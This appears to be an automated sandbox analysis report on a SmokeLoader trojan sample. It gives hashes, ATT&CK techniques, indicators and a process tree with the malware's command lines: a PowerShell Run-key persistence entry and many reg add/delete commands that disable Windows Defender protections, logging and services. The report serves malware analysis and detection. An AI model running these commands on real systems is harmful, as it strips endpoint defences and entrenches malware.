smokeloader | 90d841da88320cac9daa43c1af2de6e5e1156cb44727c2fc1121e33ce6c7543b

Analysis

max time kernel
150s
max time network
150s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
08-09-2024 03:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

90d841da88320cac9daa43c1af2de6e5e1156cb44727c2fc1121e33ce6c7543b.exe
Size

2.3MB
MD5

2d1fc8d83178bbbe12c246412224dc12
SHA1

c573fab55dab8527b94e2679cdd4d97192c12601
SHA256

90d841da88320cac9daa43c1af2de6e5e1156cb44727c2fc1121e33ce6c7543b
SHA512

2ea5faf7fb6feab88694ee67b75e1b7b5544e995820d87c2453a9010c890a64165e51581c3dd6fc1029551ac6aa35cf5004c658ccf037f3cb94476b6dd4656e7
SSDEEP

49152:oDrqDD6k5mlz7mjIbO7SXxRJd+2mY09ZlAONpv1A5H:tt5k3mF7SXxRz+2lavWH

Score

10^/10

smokeloader backdoor defense_evasion discovery evasion execution persistence spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3956	powershell.exe
3416	powershell.exe
4600	powershell.exe

.NET Reactor proctector 1 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral2/memory/1088-3318-0x0000000000400000-0x0000000000768000-memory.dmp	net_reactor

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dAWb2d3ve7XMXW0Z.exe	rh111.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dAWb2d3ve7XMXW0Z.exe	rh111.exe

Executes dropped EXE 4 IoCs

pid	Process
3616	km111.exe
1412	km111.exe
2556	rh111.exe
1088	rh111.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000\Software\Microsoft\Windows\CurrentVersion\Run\km111 = "C:\\Users\\Admin\\AppData\\Roaming\\km111.exe"	powershell.exe

Modifies Security services 2 TTPs 5 IoCs

Modifies the startup behavior of a security service.

defense_evasion

Modify Registry

T1112

Impair Defenses

T1562

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4"	reg.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 4032 set thread context of 3824	4032	90d841da88320cac9daa43c1af2de6e5e1156cb44727c2fc1121e33ce6c7543b.exe	82
PID 3616 set thread context of 1412	3616	km111.exe	83
PID 2556 set thread context of 1088	2556	rh111.exe	92

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rh111.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rh111.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	90d841da88320cac9daa43c1af2de6e5e1156cb44727c2fc1121e33ce6c7543b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	km111.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	km111.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1492	PING.EXE

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	90d841da88320cac9daa43c1af2de6e5e1156cb44727c2fc1121e33ce6c7543b.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	90d841da88320cac9daa43c1af2de6e5e1156cb44727c2fc1121e33ce6c7543b.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	90d841da88320cac9daa43c1af2de6e5e1156cb44727c2fc1121e33ce6c7543b.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1492	PING.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
3956	powershell.exe
3956	powershell.exe
3416	powershell.exe
3416	powershell.exe
4600	powershell.exe
4600	powershell.exe

Suspicious use of AdjustPrivilegeToken 35 IoCs

description	pid	Process
Token: SeDebugPrivilege	4032	90d841da88320cac9daa43c1af2de6e5e1156cb44727c2fc1121e33ce6c7543b.exe
Token: SeDebugPrivilege	4032	90d841da88320cac9daa43c1af2de6e5e1156cb44727c2fc1121e33ce6c7543b.exe
Token: SeDebugPrivilege	3616	km111.exe
Token: SeDebugPrivilege	3616	km111.exe
Token: SeDebugPrivilege	1412	km111.exe
Token: SeDebugPrivilege	3956	powershell.exe
Token: SeDebugPrivilege	2556	rh111.exe
Token: SeDebugPrivilege	2556	rh111.exe
Token: SeDebugPrivilege	1088	rh111.exe
Token: SeDebugPrivilege	3416	powershell.exe
Token: SeIncreaseQuotaPrivilege	1088	rh111.exe
Token: SeBackupPrivilege	1088	rh111.exe
Token: SeChangeNotifyPrivilege	1088	rh111.exe
Token: SeSystemtimePrivilege	1088	rh111.exe
Token: 34	1088	rh111.exe
Token: SeCreatePagefilePrivilege	1088	rh111.exe
Token: SeCreateGlobalPrivilege	1088	rh111.exe
Token: 35	1088	rh111.exe
Token: SeDebugPrivilege	1088	rh111.exe
Token: SeRemoteShutdownPrivilege	1088	rh111.exe
Token: SeImpersonatePrivilege	1088	rh111.exe
Token: 33	1088	rh111.exe
Token: SeIncBasePriorityPrivilege	1088	rh111.exe
Token: SeLoadDriverPrivilege	1088	rh111.exe
Token: SeSecurityPrivilege	1088	rh111.exe
Token: SeSystemEnvironmentPrivilege	1088	rh111.exe
Token: 36	1088	rh111.exe
Token: SeManageVolumePrivilege	1088	rh111.exe
Token: SeProfSingleProcessPrivilege	1088	rh111.exe
Token: SeSystemProfilePrivilege	1088	rh111.exe
Token: SeUndockPrivilege	1088	rh111.exe
Token: SeRestorePrivilege	1088	rh111.exe
Token: SeShutdownPrivilege	1088	rh111.exe
Token: SeTakeOwnershipPrivilege	1088	rh111.exe
Token: SeDebugPrivilege	4600	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4032 wrote to memory of 3616	4032	90d841da88320cac9daa43c1af2de6e5e1156cb44727c2fc1121e33ce6c7543b.exe	81
PID 4032 wrote to memory of 3616	4032	90d841da88320cac9daa43c1af2de6e5e1156cb44727c2fc1121e33ce6c7543b.exe	81
PID 4032 wrote to memory of 3616	4032	90d841da88320cac9daa43c1af2de6e5e1156cb44727c2fc1121e33ce6c7543b.exe	81
PID 4032 wrote to memory of 3824	4032	90d841da88320cac9daa43c1af2de6e5e1156cb44727c2fc1121e33ce6c7543b.exe	82
PID 4032 wrote to memory of 3824	4032	90d841da88320cac9daa43c1af2de6e5e1156cb44727c2fc1121e33ce6c7543b.exe	82
PID 4032 wrote to memory of 3824	4032	90d841da88320cac9daa43c1af2de6e5e1156cb44727c2fc1121e33ce6c7543b.exe	82
PID 4032 wrote to memory of 3824	4032	90d841da88320cac9daa43c1af2de6e5e1156cb44727c2fc1121e33ce6c7543b.exe	82
PID 4032 wrote to memory of 3824	4032	90d841da88320cac9daa43c1af2de6e5e1156cb44727c2fc1121e33ce6c7543b.exe	82
PID 4032 wrote to memory of 3824	4032	90d841da88320cac9daa43c1af2de6e5e1156cb44727c2fc1121e33ce6c7543b.exe	82
PID 3616 wrote to memory of 1412	3616	km111.exe	83
PID 3616 wrote to memory of 1412	3616	km111.exe	83
PID 3616 wrote to memory of 1412	3616	km111.exe	83
PID 3616 wrote to memory of 1412	3616	km111.exe	83
PID 3616 wrote to memory of 1412	3616	km111.exe	83
PID 3616 wrote to memory of 1412	3616	km111.exe	83
PID 3616 wrote to memory of 1412	3616	km111.exe	83
PID 3616 wrote to memory of 1412	3616	km111.exe	83
PID 1412 wrote to memory of 3956	1412	km111.exe	85
PID 1412 wrote to memory of 3956	1412	km111.exe	85
PID 1412 wrote to memory of 3956	1412	km111.exe	85
PID 1412 wrote to memory of 1912	1412	km111.exe	87
PID 1412 wrote to memory of 1912	1412	km111.exe	87
PID 1412 wrote to memory of 1912	1412	km111.exe	87
PID 1912 wrote to memory of 3736	1912	cmd.exe	89
PID 1912 wrote to memory of 3736	1912	cmd.exe	89
PID 1912 wrote to memory of 3736	1912	cmd.exe	89
PID 1912 wrote to memory of 1492	1912	cmd.exe	90
PID 1912 wrote to memory of 1492	1912	cmd.exe	90
PID 1912 wrote to memory of 1492	1912	cmd.exe	90
PID 1912 wrote to memory of 2556	1912	cmd.exe	91
PID 1912 wrote to memory of 2556	1912	cmd.exe	91
PID 1912 wrote to memory of 2556	1912	cmd.exe	91
PID 2556 wrote to memory of 1088	2556	rh111.exe	92
PID 2556 wrote to memory of 1088	2556	rh111.exe	92
PID 2556 wrote to memory of 1088	2556	rh111.exe	92
PID 2556 wrote to memory of 1088	2556	rh111.exe	92
PID 2556 wrote to memory of 1088	2556	rh111.exe	92
PID 2556 wrote to memory of 1088	2556	rh111.exe	92
PID 2556 wrote to memory of 1088	2556	rh111.exe	92
PID 2556 wrote to memory of 1088	2556	rh111.exe	92
PID 1088 wrote to memory of 2644	1088	rh111.exe	93
PID 1088 wrote to memory of 2644	1088	rh111.exe	93
PID 1088 wrote to memory of 2644	1088	rh111.exe	93
PID 2644 wrote to memory of 2184	2644	cmd.exe	95
PID 2644 wrote to memory of 2184	2644	cmd.exe	95
PID 2644 wrote to memory of 2184	2644	cmd.exe	95
PID 1088 wrote to memory of 3136	1088	rh111.exe	96
PID 1088 wrote to memory of 3136	1088	rh111.exe	96
PID 1088 wrote to memory of 3136	1088	rh111.exe	96
PID 3136 wrote to memory of 2656	3136	cmd.exe	98
PID 3136 wrote to memory of 2656	3136	cmd.exe	98
PID 3136 wrote to memory of 2656	3136	cmd.exe	98
PID 1088 wrote to memory of 3980	1088	rh111.exe	99
PID 1088 wrote to memory of 3980	1088	rh111.exe	99
PID 1088 wrote to memory of 3980	1088	rh111.exe	99
PID 3980 wrote to memory of 3052	3980	cmd.exe	101
PID 3980 wrote to memory of 3052	3980	cmd.exe	101
PID 3980 wrote to memory of 3052	3980	cmd.exe	101
PID 1088 wrote to memory of 3880	1088	rh111.exe	102
PID 1088 wrote to memory of 3880	1088	rh111.exe	102
PID 1088 wrote to memory of 3880	1088	rh111.exe	102
PID 3880 wrote to memory of 2952	3880	cmd.exe	104
PID 3880 wrote to memory of 2952	3880	cmd.exe	104
PID 3880 wrote to memory of 2952	3880	cmd.exe	104

C:\Users\Admin\AppData\Local\Temp\90d841da88320cac9daa43c1af2de6e5e1156cb44727c2fc1121e33ce6c7543b.exe
"C:\Users\Admin\AppData\Local\Temp\90d841da88320cac9daa43c1af2de6e5e1156cb44727c2fc1121e33ce6c7543b.exe"
1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4032
- C:\Users\Admin\AppData\Local\Temp\km111.exe
  "C:\Users\Admin\AppData\Local\Temp\km111.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3616
- - C:\Users\Admin\AppData\Local\Temp\km111.exe
    "C:\Users\Admin\AppData\Local\Temp\km111.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1412
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'km111';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'km111' -Value '"C:\Users\Admin\AppData\Roaming\km111.exe"' -PropertyType 'String'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3956
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jsUWddJYBLu3.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1912
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3736
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 5 localhost
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1492
    - - C:\Users\Admin\AppData\Local\Temp\rh111.exe
        
        "C:\Users\Admin\AppData\Local\Temp\rh111.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2556
      - C:\Users\Admin\AppData\Local\Temp\rh111.exe
        
        "C:\Users\Admin\AppData\Local\Temp\rh111.exe"
        6⤵
        Drops startup file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1088
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2644
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2184
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3136
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2656
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3980
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3052
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:3880
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2952
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5056
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
        8⤵
        Modifies Windows Defender Real-time Protection settings
        System Location Discovery: System Language Discovery
        
        PID:1464
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3552
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
        8⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:1896
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
        7⤵
        
        PID:1652
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
        8⤵
        Modifies Windows Defender Real-time Protection settings
        System Location Discovery: System Language Discovery
        
        PID:880
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1560
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        8⤵
        Modifies Windows Defender Real-time Protection settings
        System Location Discovery: System Language Discovery
        
        PID:2696
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3360
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
        8⤵
        Modifies Windows Defender Real-time Protection settings
        System Location Discovery: System Language Discovery
        
        PID:2860
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2684
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:1408
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
        7⤵
        
        PID:2936
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:488
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3768
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4464
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3856
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4020
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
        7⤵
        
        PID:4816
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2008
        
        C:\Windows\SysWOW64\cmd.exe
